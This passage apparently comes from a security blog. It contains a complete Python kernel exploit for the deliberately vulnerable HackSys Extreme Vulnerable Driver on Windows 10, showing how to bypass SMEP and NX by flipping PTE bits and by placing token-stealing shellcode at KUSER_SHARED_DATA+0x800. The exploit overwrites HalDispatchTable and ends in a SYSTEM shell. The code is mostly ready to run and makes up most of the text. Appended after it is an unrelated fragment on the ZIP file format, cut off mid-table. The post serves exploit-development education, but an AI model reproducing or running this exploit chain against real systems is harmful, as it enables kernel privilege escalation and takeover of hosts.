# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM!

Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primtives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The questions still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last structures that many people used for kASLR bypasses, was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but no longer is static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and compensate any odd numbering with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808,KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.
  5. NT AUTHORITY\SYSTEM

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong() - as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4 - we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Defining KUSER_SHARED_DATA
KUSER_SHARED_DATA = 0xFFFFF78000000000

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)
    ]

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)
    ]

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)
    ]

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)
    ]

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)
    ]

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)
    ]

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)
    ]

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)
    ]


# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

"""
Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!
)
"""

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to stores PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisy c_void_p type from strucutre.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM x 2!

Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP all together and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note - some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Spending a night reading the .ZIP File Format Specification

By: admin
30 April 2020 at 09:20

One night I was bored and I wanted something to read. Some people prefer novels, others prefer poems, I prefer an RFC or an specification. So I started to read the .ZIP File Format Specification .

The overall format of a .ZIP file can be found in paragraph 4.3.6 of the specification and is the following:

 4.3.6 Overall .ZIP file format:

      [local file header 1]
      [encryption header 1]
      [file data 1]
      [data descriptor 1]
      . 
      .
      .
      [local file header n]
      [encryption header n]
      [file data n]
      [data descriptor n]
      [archive decryption header] 
      [archive extra data record] 
      [central directory header 1]
      .
      .
      .
      [central directory header n]
      [zip64 end of central directory record]
      [zip64 end of central directory locator] 
      [end of central directory record]

Lets take a closer look at local file header and central directory structure

 4.3.7  Local file header:

      local file header signature     4 bytes  (0x04034b50)
      version needed to extract       2 bytes
      general purpose bit flag        2 bytes
      compression method              2 bytes
      last mod file time              2 bytes
      last mod file date              2 bytes
      crc-32                          4 bytes
      compressed size                 4 bytes
      uncompressed size               4 bytes
      file name length                2 bytes
      extra field length              2 bytes

      file name (variable size)
      extra field (variable size)
4.3.12 Central directory structure:

      [central directory header 1]
      .
      .
      .
      [central directory header n]
      [digital signature]

      File header:
          central file header signature   4 bytes (0x02014b50)
          version made by                 2 bytes
          version needed to extract       2 bytes
